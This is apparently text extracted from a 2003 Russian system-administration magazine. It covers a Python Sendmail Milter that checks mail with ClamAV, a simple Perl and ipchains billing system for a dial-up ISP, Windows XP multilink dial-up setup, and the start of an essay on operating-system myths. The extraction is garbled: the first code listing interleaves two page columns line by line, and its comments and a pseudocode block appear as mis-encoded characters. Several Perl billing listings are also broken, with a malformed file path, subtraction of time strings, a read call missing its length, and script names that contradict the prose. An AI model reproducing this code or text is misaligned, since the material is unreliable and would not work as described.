""" self.fp = None
# çàïèñàòü ïîëå â ñïèñîê if self.tempname:
self.headers.append("%s: %s" % (name, val)) os.remove(self.tempname)
lname = name.lower() self.tempname = None
if lname in (“subject”, “from”, “to”): return Milter.CONTINUE
self.log(“%s: %s” % (lname, val))
return Milter.CONTINUE if __name__ == "__main__":
os.chdir("/home/milter")
def eoh(self): tempfile.tempdir = "/var/tmp"
"""Âûçûâàåòñÿ ïî îêîí÷àíèè îáðàáîòêè çàãîëîâêà socketname = "inet:2525@milter.host.ru"
""" timeout = 240 # ñåêóíä
# Íà÷èíàåì çàïèñûâàòü ñîîáùåíèå âî âðåìåííûé Milter.factory = ExampleMilter
# ôàéë. Ñíà÷àëà çàãîëîâêè Milter.set_flags(Milter.CHGBODY + Milter.CHGHDRS +
self.tempname = tempfile.mktemp(".milter.tmp") Milter.ADDHDRS + Milter.DELRCPT +
self.fp = open(self.tempname, "w+b") Milter.ADDRCPT)
self.fp.write("\n".join(self.headers) + "\n\n") print """Example Milter start"""
return Milter.CONTINUE sys.stdout.flush()
Milter.runmilter("mainfilter", socketname, timeout)
def body(self, chunk): print """Example Milter shutdown"""
написании своего фильтра, как и то, что в рамках одно- ретному сообщению – в envfrom(). Соответственно, конеч-
го соединения может быть обработано несколько сооб- ной точкой использования таких имен должны быть мето-
щений. В силу чего требуется правильно инициализиро- ды close() и eom().
вать имена: те, что относятся ко всему соединению, нуж- На любом этапе работы фильтра можно решить судь-
но инициализировать в connect(), а относящиеся к конк- бу сообщения, возвратив Milter.REJECT (отклонить),

40

ëèñòèíã ¹2
def eom(self):
"""Îáðàáîòêà ñîîáùåíèÿ: ïðîâåðêà íà âèðóñû
ñ ïîìîùüþ àíòèâèðóñà ClamAV"""
# Çàêðûâàåì âðåìåííûé ôàéë (åñëè îí åñòü)
if self.fp:
self.fp.close()
else:
return Milter.TEMPFAIL
try:
clam=os.popen("clamscanm <%s"%self.tempname,"r").read()
if clam.find("FOUND") != -1:
self.log(“virus rejected: %s” % clam)
self.setreply(“550”,’5.1.1',’VIRUS FOUND %s’ % clam)
return Milter.REJECT
except:
dbg_except()
self.log(“msg accepted: size=%s” % self.bodysize)
return Milter.ACCEPT
Milter.ACCEPT (принять), Milter.DROP (выбросить) или про-
должить обработку – Milter.CONTINUE. В методе eom()
можно менять некоторые свойства обрабатываемого со-
общения (см. комментарии в листинге 1). Напомним, что
состав получателей не обязательно соответствует содер-
жимому полей To, Cc, Bcc, так как эти данные передают-
ся отдельными командами протокола SMTP.
Для включения фильтра необходимо добавить пример-
но следующие две строки к файлу sendmail.mc:
MAIL_FILTER(`mainfilter', `S=inet:2525@milter.host.ru,
T=C:10m;S:30s;R:30s;E:10m')
define(`confINPUT_MAIL_FILTERS', `mainfilter')
Здесь milter.host.ru и 2525 – хост, на котором запущен
Milter, и порт (номер выбран произвольно).
Если вы привыкли напрямую править sendmail.cf (что
очень не рекомендуется), то в него нужно добавить сле-
дующее:
O InputMailFilters=mainfilter
#O Milter.LogLevel O Milter.macros.connect=j, _, {daemon_name},
{if_name}, {if_addr}
O Milter.macros.helo={tls_version}, {cipher}, {cipher_bits},
{cert_subject}, {cert_issuer}
O Milter.macros.envfrom=i, {auth_type}, {auth_authen},
{auth_ssf}, {auth_author}, {mail_mailer}, {mail_host},
{mail_addr}
O Milter.macros.envrcpt={rcpt_mailer}, {rcpt_host}, {rcpt_addr}
Xfilteronegoru, S=inet:2525@milter.host.ru,
T=C:10m;S:30s;R:30s;E:10m
Описание каждого фильтра в файле конфигурации
Sendmail может сопровождаться тремя опциями: F, S и
T. Если опция F не задана, то проблемы с фильтром без-
болезненны для доставляемого Sendmail сообщения.
Если F=T, неработоспособность фильтра приводит к вре-
менной неудаче (temporary fail) доставки сообщения. Если
F=R и фильтр недоступен, сообщение отвергается
(reject). В опции S указывается адрес фильтра, имеющий
один из приведенных ниже форматов:
S=local:ïóòü
S=inet:ïîðò@õîñò
S=inet6:ïîðò@õîñò
Здесь путь – путь к UNIX-сокету в локальной файло-
вой системе, остальные – IP-сокеты на некотором хосте.
Опции Т задают таймауты. C – таймаут соединения с
фильтром; S – таймаут при передаче информации от
Sendmail фильтру; R – таймаут при ожидании ответа филь-
тра; E – таймаут ожидания окончательного подтвержде-
№2(3), февраль 2003
администрирование
ния от момента передачи конца сообщения фильтру.
В случае использования двух фильтров фрагмент ис-
ходного файла конфигурации Sendmail будет выглядеть
так:
MAIL_FILTER(`mainfilter', `S=inet:2525@milter.host.ru,
T=C:10m;S:30s;R:30s;E:10m')
MAIL_FILTER(`filter2', `S=inet:2626@milter.host.ru,
T=C:10m;S:30s;R:30s;E:10m')
define(`confINPUT_MAIL_FILTERS', `mainfilter,filter2')
Информация на фильтры посылается в порядке их опи-
сания. Следующий алгоритм взаимодействия Sendmail и
Milter приведен в документации к Sendmail:
Äëÿ êàæäîãî ñîåäèíåíèÿ:
Äëÿ êàæäîãî ôèëüòðà:
Âûçâàòü connect()
Âûçâàòü hello()
Äëÿ êàæäîãî ñîîáùåíèÿ (ïîñëåäîâàòåëüíî):
Äëÿ êàæäîãî ôèëüòðà:
Âûçâàòü envfrom()
Äëÿ êàæäîãî ïîëó÷àòåëÿ:
Äëÿ êàæäîãî ôèëüòðà:
Âûçâàòü envrcpt()
Äëÿ êàæäîãî ôèëüòðà:
Äëÿ êàæäîãî ïîëÿ çàãîëîâêà:
Âûçâàòü header()
Âûçâàòü eoh()
Äëÿ êàæäîãî ôðàãìåíòà òåëà:
Âûçâàòü body()
Âûçâàòü eom()
Äëÿ êàæäîãî ôèëüòðà:
Âûçâàòü close()
Примечание: при обрыве соединения на любой стадии
и по инициативе любого агента вызывается abort() и
close().
В листинге 2 приведен вариант метода eom(), с помо-
щью которого можно вызывать из Milter произвольные про-
граммы для проверки сообщения (например, на спам и
вирусы). В этом методе вызывается программа
clamscanm, принимающая файл на стандартный ввод и
выводящая результат на стандартный вывод. Результат
читается методом read() целиком и анализируется на при-
сутствие подстроки «FOUND». Если есть такая строка,
Milter устанавливает причину отказа методом setreply, пи-
шет в лог и отклоняет сообщение. Так как все это проис-
ходит при установленном SMTP-соединении, отправитель
получит «отлуп» сразу. Аналогично можно проверять по-
чту на спам.
Следует отметить, что в процессе эксплуатации неак-
куратно запрограммированный Milter может оставлять за
собой временные файлы. Следующая небольшая програм-
ма на Python стирает оставленные Milter устаревшие фай-
лы из каталога /var/tmp:
#!/usr/bin/python import os, glob, time, stat recent =
time.time() - 60*20 # 20 min for fl in glob.glob(“/var/tmp/
*.tmp”):
try:
if os.stat(fl)[stat.ST_MTIME] < recent:
os.unlink(fl)
except:
pass
Итак, Milter дает нам полный контроль над передачей
сообщений на самом раннем этапе – этапе входящего
SMTP-соединения. Фильтры можно писать на C/C++, Perl
и других языках, тем не менее Python Milter отлично справ-
ляется с задачей.
41
администрирование

СОЗДАНИЕ
ПРОСТЕЙШЕЙ
БИЛЛИНГОВОЙ
СИСТЕМЫ
Наверное, хотя бы один раз в жизни каждому из нас приходилось покупать Интернет по Dial-Up.
А раз так, то каждый из нас сталкивался с биллинговой системой: подсчетом количества времени,
трафика (мегабайт) и денег.

ДЕНИС МЯСНИЧЕНКО

В сумме весь данный комплекс про-
грамм и называется биллинговой си-
стемой. Но биллинговые системы
используются не только у интернет-
сервис-провайдеров (Internet Service
Provider).
Если на вашей АТС поминутная
оплата переговоров по коммутиру-
емой линии, то на этой АТС также
обязательно должна работать бил-
линговая система.
Если вы пользуетесь мобильным
телефоном, то у компании-провай-
дера телефонных услуг также суще-
ствует огромный комплекс биллин-
говых программ.
В нашем контексте (для ИСП)
«биллинговая система» имеет смысл
как комплекс программ для учета ко-
личества секунд и байт, затраченных
пользователем в Интернете. Вы мо-
жете спросить, почему же именно се-
кунд и байт? Очень просто – это ба-
зовые единицы измерения. Ведь
именно из секунд мы можем получить
остальные значения: минуты, часы,
сутки и так далее; из байт – килобай-
ты, мегабайты и т. д. «А деньги?» –
возразите вы. Да, все правильно, но
исходя из секунд и байт, вы сможете,
установив тариф, получить деньги.
Биллинговые системы бывают
разные, их можно примерно разде-
лить по нескольким признакам:

под какую операционную систему
написан данный биллинг (Windows,
Unix, Linux, OS/2 и т. д.);

по какому принципу данный комп-
лекс работает (принцип «счетчи-
ка», принцип «снифера», принцип
«анализа log-файлов» и т. д.);

как именно написан комплекс про-
грамм в самой системе биллинга
(бинарные файлы, скриптовые
файлы и т. д.).
Вы вправе не согласиться с та-
кой классификацией и выделить
еще несколько признаков. Напри-
мер, такой: вид вывода информа-
ции. Но автор намеренно решил не
относить данный признак к так на-
зываемым «основным», так как нет
единого стандарта на вывод инфор-
мации. Новичкам нагляднее будет
рабочая программа под управлени-
ем MS Windows, для опытных сис-
темных администраторов предпоч-
тительнее будет увидеть консольную
№2(3), февраль 2003
программу под управлением Unix –
но в итоге можно спорить сколько
угодно и не прийти к единому мне-
нию. Единственной альтернативой
будет использование платформы
Web и, как следствие, использова-
ние программы apache web server, а
в самой программе – генерация
html-страниц для показа через Сеть.
Анализ биллинговых
систем на рынке софта
Если вы решили приобрести уже го-
товый биллинг, для начала определи-
тесь: что именно вам нужно.
Для некоторых провайдеров мо-
жет быть выгоднее купить уже гото-
вый комплекс биллинговых программ,
нежели писать их самим, для этого
сделаем небольшой анализ рынка
биллинговых систем.
На нашем рынке программного
обеспечения вы можете найти практи-
чески любые биллинги, их разрабаты-
вают многие компании, но очень мало
кто может позволить себе купить дан-
ные программные продукты в силу их
огромной стоимости. Например, бил-
линговые системы для телефонных
компаний стоят начиная от $500000. А
это уже совершенно другой уровень,
нежели компании интернет-провайде-
ра, тут биллинг можно приобрести и за
$200. Но все упирается в то, что имен-
но будет делать данный биллинг! В
среднем цена достаточно хорошего
биллинга колеблется от $500 до $5000
для компаний ИСП.
И как вы понимаете, за разные
суммы создаются и разные биллинги.
Биллинги также могут либо работать
с определенным оборудованием, либо
нет. Например, если вы приобрели
себе оборудование модемного пула
Cisco – это уже дополнительное обо-
рудование к обычному компьютеру, и,
как следствие, возрастает цена мини-
мального биллинга с $200 до $500.
Так же имеются нюансы юридичес-
кого плана. Если вы покупаете бил-
линговую систему у компании с гаран-
тией или ответственностью компании
перед вами, то в зависимости от до-
говора цена может возрасти от двух
до десятков раз.
Если же вы заказываете создание
биллинга у программиста или группы
программистов (для ускорения напи-
администрирование
сание системы), то зачастую вы по-
лучаете готовую систему, но если что-
то пойдет не так, вы будете отвечать
перед вашими клиентами сами.
Есть еще нюанс. Компании всегда
предоставляют уже готовую систему,
с одной стороны, это очень удобно, к
вам приедут знающие специалисты
и создадут всю систему «под ключ»
буквально за несколько дней, но есть
и обратная сторона медали: биллин-
говая система будет у вас не уни-
кальная, а это в свою очередь зна-
чит, что вас смогут «взломать». Так
как опытные хакеры могут найти
одну «дыру» в системе и, соответ-
ственно, могут взломать и все подоб-
ные системы. В данном случае даже
самая простая, но уникальная систе-
ма будет в огромном выигрыше, т.к.
ни у кого больше такой нет.
Итак, несколько замечаний по по-
воду выбора программ биллинга в за-
висимости от того, что именно вам
надо подсчитывать и каким именно
оборудованием вы можете распола-
гать. Но нельзя считать взгляд авто-
ра единственным и непогрешимым,
тем более в области информационных
технологий можно одно и то же сде-
лать многими способами.
Если вам надо подсчитывать вре-
мя пребывания пользователя на мо-
демном пуле по коммутируемой ли-
нии, то вам легче всего будет зака-
зать биллинг у программиста. Это
дешево (около $200); система будет
формировать свои выводы в виде
html-страниц как единственного уни-
версального средства отображения
информации. Причем за $200 вы по-
лучите готовый уникальный биллинг.
Если же вы хотите организовать
биллинг на принципе анализа log-фай-
лов, то данный комплекс программ
будет еще дешевле – около $100-150.
Данные биллинги будут работать
практически на любом оборудовании,
все зависит от того, что именно вы
поставите как модемный пул. Для ма-
ленькой компании интернет-сервис-
провайдера автор советует приобрес-
ти расширитель COM-портов, так как
на один компьютер архитектуры PC
можно поставить не более 2 портов.
Компьютер класса более чем 486DX/
16 RAM/1.2 Gb HDD – это для биллинг-
сервера, но при этом вам придется
поставить отдельно веб-сервер на дру-
43
 администрирование
гом компьютере, либо увеличить про-
изводительность данного компьютера.
Создание биллинг-комплекса с
использованием дополнительного
оборудования, например, модемного
пула Cisco, сразу увеличит ваши зат-
раты, но, с другой стороны, если у вас
есть деньги на такую дорогую аппа-
ратуру, то вам уже не страшно будет
услышать цены на данные комплек-
сы. По данным сети IRC только модуль
снятия статистики с аппаратуры Cisco
будет стоить от $200 до $1000, не учи-
тывая саму биллинг-статистику. Дан-
ный вид биллинга автор советует за-
казывать уже не программисту-оди-
ночке, а команде программистов. Это
будет более дешевый выход.
В зависимости от принципа снятия
статистики очень варьируется сто-
имость разработки системы.

Использование принципа скрип-
тов – один из самых «дешевых»
принципов. Но он имеет массу не-
достатков, а главное – он не мо-
жет показать статистику в режи-
ме реального времени. Его цена
колеблется от $200 до $500.

Принцип «снифера» заключается
в создании программы, которая
будет анализировать и считать все
пакеты на данном компьютере.
Для этого уже нужна более высо-
кая производительность компью-
тера, нежели на принципе «скрип-
тов»: около (P-MMX-166/64 RAM/
4Gb HDD). Так как в режиме ре-
ального времени некая програм-
ма-демон будет работать на уров-
не ядра или на уровне пользова-
тельских программ по терминоло-
гии операционной системы Linux.
А при большом трафике, около
40 Мбит в секунду и выше, пона-
добится еще большая производи-
тельная мощность компьютеров.
В любом случае настройка про-
грамм-серверов и компьютеров-сер-
веров – это отдельная сумма. Т.е. ав-
тор приводит цены, исходя из данных
Интернета (irc.tsua.net, канал #billing).
Цены в разных регионах могут отли-
чаться и очень сильно за счет «выез-
да к клиенту» и т. д., в статье цены
приводятся «чистые», т.е. телерабо-
та, без выезда к клиенту, клиент сам
устанавливает комплекс на своем
оборудовании. В любом случае вы мо-
44
жете зайти в сеть IRC на канал, по-
священный биллинговым системам и
получить помощь или консультацию.
Данная статья не претендует на
полное описание всех возможных
биллингов, все их описать в одной ста-
тье невозможно. Темой данной статьи
является создание простейшего бил-
линга для маленького новоиспеченно-
го интернет-сервис-провайдера.
Создание простейшей
биллинговой системы
Стадия 1: анализ
Для примера рассмотрим создание
простейшей биллинговой системы,
построенной по принципу скриптов-
счетчиков для снятия трафика и под-
счета времени, затраченного пользо-
вателем в Интернете. Данная статис-
тика больше будет приемлема для
провайдера, использующего модем-
ный пул. Мы будем создавать биллин-
говую систему, ориентируясь на опе-
рационную систему Linux, так как она
открыта, ее можно свободно купить
или загрузить из Интернета. Исходя
из выбранного дистрибутива Linux,
мы выберем компьютер и приступим
к написанию.
Дистрибутивов Linux существует
огромное количество. Есть дистрибу-
тивы, которые больше ориентирова-
ны на серверы; есть те, которые боль-
ше ориентированы на графику; есть
такие, которые пытаются потягаться
с MS Windows на поприще рабочих
станций, и это у них очень хорошо
получается.
В нашем же случае необходимо
выбрать сервер. Хотя из любого дист-
рибутива Linux можно сделать самому
руками и сервер, и рабочую станцию, и
мультимедийную станцию, но все-таки
лучше выбирать изначально сервер-
ориентированный дистрибутив. Таким,
на взгляд автора, является дистрибутив
RedHat – самый распространенный ди-
стрибутив по части серверных опера-
ционных систем. Многим он может не
понравиться, или не нравится уже сей-
час, – вы вправе выбрать любой дру-
гой дистрибутив и, автор думает, у вас
все получится без изменения исходных
кодов, приведенных в данной статье.
Многие могут высказаться за опе-
рационную систему FreeBSD, но у нее
есть небольшой недостаток – нович-
ку в ней очень тяжело разобраться. А
данная статья рассчитана на нович-
ков в этом деле.
Итак, мы выбрали ветвь RedHat-
дистрибутивов. Теперь надо опреде-
литься с версией. Автор предлагает
брать последнюю (на момент написа-
ния статьи) – 7.3 – стабильная после-
дняя версия.
Для данного дистрибутива нужен
достаточно мощный компьютер, а так
как мы рассчитываем на довольно
слабый компьютер, то лучше взять
клон дистрибутива RedHat украинс-
кой команды BlackCat Linux Team. Они
ввели дополнительный компонент,
повышающий безопасность дистрибу-
тива. Он разрабатывался, когда еще
не было таких мощных машин, и бу-
дет себя прекрасно чувствовать на
слабом компьютере.
Плату расширения COM-портов
можете выбрать самостоятельно: тут
не возникнет проблем. Для всех них
существуют драйверы под RedHat 6.2.
Наш выбор: BlackCat Linux 6.2 на
P-MMX-166/32 RAM/2Gb HDD.
Стадия 2: реализация
Для реализации задуманного нам по-
требуются знания операционной сис-
темы Linux, немного программирова-
ния на языке Perl и Bash. Bash на са-
мом деле не язык программирования,
а язык написания скриптов, как и Perl.
Если кто-то захочет, то сможет это все
реализовать на любом другом языке
программирования.
Итак, для того чтобы начинать пи-
сать, нам надо знать как это все ра-
ботает в операционной системе. Схе-
ма довольно-таки простая.
звонок пользователя
соединение модемов, авторизация
поднятие TCP/IP-протокола

Начнем по порядку. Пользователь
звонит на сервер. Модем поднимает
трубку и происходит установка связи
двух модемов. Когда связь установ-
лена, процесс входа пользователем в
Сеть переходит во вторую фазу –
фазу авторизации. Затем, после ав-
торизации, наступает фаза поднятия
TCP/IP-протокола. Вот так происходит
вход пользователя в Сеть в Linux. Вы-
ход происходит в обратном порядке.
Сначала опускается TCP/IP-протокол,
затем выход-авторизация, затем раз-
рыв связи. Иногда бывает, что проис-
ходит разрыв связи не по воле пользо-
вателя. Тогда немного меняется схе-
ма: сначала происходит разрыв свя-
зи, затем уже снятие TCP/IP-протоко-
ла, и последнее – выход-авторизация.
Мы внесем некоторые изменения
в данную схему, а именно: добавим
дополнительный блок. После уста-
новки соединения и полной автори-
зации будет выполняться наша ма-
ленькая программа, которая будет
сохранять имя пользователя, время
его входа и любые другие данные,
которые могут потребоваться в ва-
шей системе.
Так же добавим дополнительное
звено и в выходную цепочку, поста-
вив дополнительное звено после вы-
ход-авторизации.
звонок пользователя
соединение модемов, авторизация
сохранение временных данных,
необходимых для подсчета
поднятие TCP/IP-протокола
На практике это произойдет пу-
тем редактирования двух файлов
auth-up и auth-down, находящихся в
№2(3), февраль 2003
директории [/etc/ppp]. Добавим в
конец обоих файлов по строке:
/etc/ppp/billing-up {PEERNAME}
/etc/ppp/billing-down {PEERNAME}
соответственно. Данные строчки пос-
ле авторизации или выход-авториза-
ции запустят наши программы бил-
линговой системы. Через пробел в
наши скрипты мы добавляем любые
переменные, которые захотим пере-
дать в программу. Переменная
{PEERNAME} имеет значение имени
пользователя или, точнее сказать, его
логина. О том, как сделать полную
авторизацию с паролем через соб-
ственную систему биллинга, будет от-
дельная статья. Так как нам необхо-
димо было передать в биллинговую
систему не только имя пользователя,
но и время его входа – мы воспользу-
емся языком программирования Perl
и вызовем функцию системного вре-
мени.
auth-up
1.#!/usr/bin/perl
2.# Ïðîãðàììà auth-up
3.# Ñîõðàíåíèå ëîãèíà ïîëüçîâàòåëÿ
è âðåìåíè åãî âõîäà
4.$username = $ARGV[1];
5.open(FL, ‘> /etc/ppp online.usr’);
6.print(FL, “$username “, localtime,
“\n”);
Строка 01 – обязательная, она сооб-
щает, что это Perl-программа. Строка
04 – мы переприсваиваем имя пользо-
вателя из массива в переменную, это-
го можно и не делать, – это сделано
для наглядности. Строка 05 – откры-
ваем файл для записи, в данном фай-
ле будет храниться строка: что за
пользователь зашел и во сколько (в
формате UTC). Строка 06 – собствен-
но, запись имени пользователя и вре-
мени его входа в систему.
auth-down
1.#!/usr/bin/perl
2.# Ïðîãðàììà auth-down
3.# Îêîí÷àòåëüíûé àíàëèç ïðåáûâàíèÿ
ïîëüçîâàòåëÿ â Èíòåðíåòå.
4.$username = $ARGV[1];
5.open(FL, ‘< /etc/ppp/online.usr’);
6.read(FL, $temp);
7.close(FL);
8.chomp($temp);
9.@user = split(/ /,$temp);
10.$logintime = $user[2];
11.$logouttime = localtime;
12.$timeonline = $logouttime —
администрирование
$logintime;
13.open(FL, ‘>> /var/log/inet.usr’);
14.print(FL, “User: $username, LogIn:
$logintime, LogOut: $logouttime,
OnLineTime: $timeonline”);
Первые строки программы такие
же, как и в предыдущей программе.
Строка 04 – переприсваивание име-
ни пользователя. Строки 05-07 – от-
крытие файла, чтение из него стро-
ки, закрытие файла, или, точнее, ос-
вобождение дескриптора файла.
Строка 08 – это обрезание лишних
пробелов и символа перевода карет-
ки. Строка 09 – разбиение строки на
массив переменных. Переприсваи-
ваем в с троке 10 время входа
пользователя для наглядности. Уз-
наем время выхода пользователя в
с троке 11. В строке 12 узнаем,
сколько времени пробыл пользова-
тель на линии, данное число пред-
ставляет собой количество секунд.
В строке 13 открываем файл для
добавления записи о пользователе.
Строка 14, собственно, сама запись:
фиксируем имя пользователя, время
входа, время выхода и время, прове-
денное пользователем на линии.
Данная система биллинга очень
простая: она считает только лишь вре-
мя, проведенное пользователем на
линии. Для того чтобы считать коли-
чество байт, которые пользователь
загрузил или выгрузил из Интернета,
нужно усложнить наши программы. В
каждом конкретном случае надо под-
ходить отдельно.
Для той операционной системы, ко-
торую мы выбрали для написания бил-
линга, свойственно ядро (kernel) версии
2.2.х. В данном ядре была реализова-
на система контроля за IP-пакетами –
на уровне IP-цепочек (ipchains). Для
версии ядра 2.4.х уже реализована си-
стема Netfilter, с управлением через IP-
таблицы (iptables). Она более гибкая и
более совершенная, нежели цепочки.
Но в выбранной операционной систе-
ме применены цепочки, вы можете
сами пересобрать ядро более высокой
версии, но это уже отдельная тема.
Существует очень много способов
подсчета трафика, автор приводит
для примера один из них: принцип
счетчика.
Чтобы подсчитать количество
байт, загруженных или выгруженных
пользователем, необходимо создать
45
 администрирование
правило цепочек для конкретного IP,
так как Linux использует для иден-
тификации IP-пакетов IP-адреса. И
каждому пользователю, подключен-
ному по модему, всегда выдается IP-
адрес, причем реально выдается
два IP-адреса: один – на модем со
стороны сервера, второй – на модем
пользователя. Конечно же, IP-адре-
са выдаются не на физически рабо-
тающий модем, а на компьютер. Для
создания правила цепочки необхо-
димо знать IP-адрес, который вы-
дался пользователю. Для этого су-
ществует специальный параметр в
скриптах auth-up и auth-down, дан-
ный параметр называется {RE-
MOTEIP}. Его надо передать в про-
грамму, которая будет создавать
правило. А так же в программу, ко-
торая будет снимать показания счет-
чика и удалять после выхода пользо-
вателя счетчик.
Данные программы будут count-up
и count-down, их вызов надо будет
проставить из скриптов auth-up и auth-
down соответственно:
/etc/ppp/count-up {PEERNAME}
{REMOTEIP}
/etc/ppp/count-down {PEERNAME}
{REMOTEIP}
Именем цепочки будет служить имя
пользователя, вернее, его логин.
ipchains –N {PEERNAME}
Создание новой цепочки с именем
пользователя.
ipchains –F {PEERNAME}
46
Удаление всех правил в цепочке.
ipchains –Z {PEERNAME}
Удаление пустой цепочки.
ipchains –L {PEERNAME} –nvx
Извлечение статистики по цепочке
{PEERNAME} в полном формате, не
сокращая количество байт.
ipchains –A input –s {REMOTEIP}/32
–d 0/0 –j {PEERNAME}
Добавление правила в цепочку input,
которое будет срабатывать при появ-
лении пакета с исходным адресом на-
шего пользователя {REMOTEIP}/32 и
адресом назначения любым (0/0),
причем будет происходить переход в
цепочку с именем нашего пользова-
теля {PEERNAME}.
ipchains –A output –d {REMOTEIP}/32
–s 0/0 –j {PEERNAME}
Добавление правила в цепочку
output, которое будет срабатывать
при появлении пакета с адресом на-
значения нашего пользователя
{REMOTEIP}/32, а исходный адрес
может быть любым (0/0), причем пе-
реход будет происходить в цепочку
с именем {PEERNAME}.
ipchains –D input –s {REMOTEIP}/32
–d 0/0 –j {PEERNAME}
Удаление правила из цепочки
input.
ipchains –D output –d {REMOTEIP}/32
–s 0/0 –j {PEERNAME}
Удаление правила из цепочки output.
Из этих команд вы сами можете со-
здать какую хотите систему счетчиков
по образу и подобию программ, при-
веденных выше.
Стадия 3: ограничения
на тестирование
До начала тестирования системы
надо сразу узнать количество ограни-
чений, присущих данной, крайне про-
стой, системе биллинга.
Во-первых, имя пользователя мо-
жет быть только лишь цифробуквен-
ным и не более 8 символов.
Во-вторых, данная система не бу-
дет работать, если пользователи бу-
дут заходить одновременно с разных
модемов, так как это будет уже ком-
мерческим биллингом. Для реализа-
ции этого пункта нужно не так уж мно-
го сил, но автор специально не при-
водит в статье эти изменения. Вы их
всегда можете узнать или получить в
Сети IRC, бесплатно или нет, – это уже
все зависит от вас.
В-третьих, данная система форми-
рует только выходной текстовый файл
(/var/log/inet.usr), но не формирует
вывода в html-страницах. Этот пункт
также можно реализовать при неболь-
ших затратах сил.
Остальное не столь существенно
как первые три пункта.
Ну вот и все. Если у кого-нибудь
возникли вопросы по данной теме, из-
менения или дополнения к статье, ав-
тор будет рад вам ответить.

УСТАНАВЛИВАЕМ
MULTIPLE-DEVICE
(MULTILINK)-ДОЗВОН В
WINDOWS XP ТАТЬЯНА АНТИПОВА
В Windows XP вы можете использо-
вать несколько модемов, чтобы под-
ключиться к ISP-провайдеру, тем са-
мым увеличивая общую скорость пе-
редачи ваших данных. Multiple-
device-дозвон (также известный как
PPP, modem aggregation или Multilink)
позволяет объединять несколько фи-
зических устройств в одно логичес-
кое устройство. Как правило, две или
больше ISDN-линий или модемов
связываются вместе для увеличения
пропускной способности. Теперь это
можно использовать в системах
Windows XP.
Требования
Чтобы использовать multiple-device-
дозвон, должны выполняться следую-
щие условия:

Ваш ISP-провайдер должен под-
держивать синхронизацию не-
скольких доменов.

Вы должны установить несколько
модемов.

Для каждого модема требуется от-
дельная телефонная линия.
Обратите внимание, что один
ISDN-адаптер может работать как не-
сколько устройств, потому что ISDN
включает два 56-Kbps B канала, ко-
торые могут использоваться незави-
симо.
Конфигурируем
multiple-device-дозвон
Особенность Network Connections по-
зволяет использовать Point-to-Point
(PPP) Multilink-дозвон в нескольких
ISDN, X.25 или модемных линиях. Эта
особенность объединяет несколько
физических каналов в логический
канал связи; получившийся канал уве-
личивает пропускную способность
подключения. Чтобы использовать не-
сколько устройств для дозвона, ваше
№2(3), февраль 2003
подключение и сервер удаленного до-
ступа должны поддерживать Multilink.
Network Connections может дина-
мически управлять линиями, исполь-
зующими Multilink. Система позволя-
ет ограничивать количество исполь-
зуемых линий, тем самым устраняя
дополнительную пропускную способ-
ность. Вы можете конфигурировать
условия, при которых будут использо-
ваться дополнительные линии, изме-
няя параметры настройки Network
Connections.
Обратите внимание: если вы ис-
пользуете Multilink, чтобы дозвонить-
ся до сервера, который требует об-
ратный вызов (callback), только одно
из ваших Multilink-устройств будет ис-
пользоваться для обратного дозвона.
Это происходит, потому что можно
хранить только один номер в учетной
записи пользователя. Поэтому со-
единится только одно устройство, и
все другие устройства не будут ис-
пользоваться, – т.е. ваше подключе-
ние теряет функциональные возмож-
ности Multilink. Этой проблемы мож-
но избежать:

Если phonebook-запись для
Multilink-подключения использует
стандартную конфигурацию моде-
ма, и сервер удаленного доступа,
который вызывает ваше подклю-
чение, использует больше одной
строки для одного номера.

Если phonebook-запись для
Multilink подключения – ISDN с дву-
мя каналами, которые имеют один
номер.
Конфигурируем
подключение:
1. Жмем Start –> Start –> Network and
Internet Connections и затем жмем на
Network Connections.
2. Жмем нa подключение, которое вы
хотите сконфигурировать (например,
администрирование
dial-up-подключение), и затем, под
Network Tasks, жмем на Change
settings of this connection.
3. Жмем вкладку General, и затем
выбираем устройства, которые вы хо-
тите использовать для этого подклю-
чения.
4. Используйте один или несколько из
следующих шагов:

Чтобы конфигурировать устрой-
ства дозвона, телефонные номе-
ра, адрес хоста, коды страны или
области, правила набора, жмите
на вкладку General.

Чтобы конфигурировать опции
дозвона и повторного дозвона или
X.25-параметры, жмите на вклад-
ку Options.

Чтобы конфигурировать иденти-
фикацию, шифрование данных
или окно терминала и варианты
начального сценария, жмите на
вкладку Security.

Чтобы конфигурировать сервер
удаленного доступа и используе-
мые протоколы для создаваемого
подключения, жмите на вкладку
Networking. Также кликните
Settings и выберите Negotiate multi-
link для single link подключения.

Чтобы включить и отключить
Internet Connection Sharing, Internet
Connection Firewall и on-demand-
дозвон, жмите на вкладку
Advanced.
Примечания:

В зависимости от формируемого
типа подключения, в свойствах
подключения появляются различ-
ные опции и вкладки.

Для подробной информации об оп-
ределенном элементе на вкладке
щелкните правой кнопкой мыши
по элементу и затем щелкните
What’s This?
47
администрирование

МИФЫ И ЛЕГЕНДЫ
СОВРЕМЕННОЙ
ОСОЛОГИИ…

ИЛИ «ОС –
ЭТО БОЛЬШОЙ
ПОЛОСАТЫЙ МУХ?»
Речь пойдёт о весьма распространённых мифах о трёх популярных операционных системах
(Windows, Unix FreeBSD и Linux) в частности и о других в общем (сюда будут отнесены QNX, OS/2,
BeOS и все-все-все…). Итак, что у нас есть на данный момент? Относительно немного:
компьютерное сообщество, имеющее дурную привычку тратить много сил, энергии, дискового
пространства серверов и сетевой пропускной способности для обсуждения того, чья игрушка
лучше, а именно: Windows, Unix FreeBSD или Linux. На основании этих… назовём их мягко –
споров, часто складывается определённое мнение людей, не особо в этом разбирающихся…
Попробуем заняться сложным и опасным делом – понять, кто прав, а кто – не очень.

АЛЕКСАНДР ПОТЕМКИН
48

Microsoft Windows
И первым кандидатом (по популярно-
сти) у нас будет продукция от небе-
зызвестной компании Microsoft.
Встречайте! Операционная система
Windows! Я думаю, а точнее даже уве-
рен, что многие из нас слышали не
один анекдот об этом творении (на-
пример, про зависающие ракеты под
управлением ОС Windows), думаю,
что многие имели «счастье» лицез-
реть «крахи» и «баги» этой операци-
онки… Но позволю себе «наглость»
заняться подробным рассмотрением
всех посягательств на неё.

Посягательство первое: ОС
Windows – самая ужасная опера-
ционка!

Опровержение: угу, если ещё
есть с чем сравнивать… Очень лю-
бят эти фразы писать из-под
Internet Explorer (не в редакции для
Solaris…) или в mIRC, на худой ко-
нец, в ICQ от Мирабилиса (опять-
таки Windows-версия). Это я всё к
чему? Да к тому, что подобные
фразы часто пишут люди, ничего
другого не видевшие, либо слы-
шавшие про легендарную надёж-
ность Unix-систем (до них ещё до-
берёмся).

Посягательство второе: ОС
Windows – очень нестабильна…

Опровержение: Здесь сложно
спорить. Можно привести только
одно оправдание и один упрёк. Оп-
равдание можно озвучить как тот
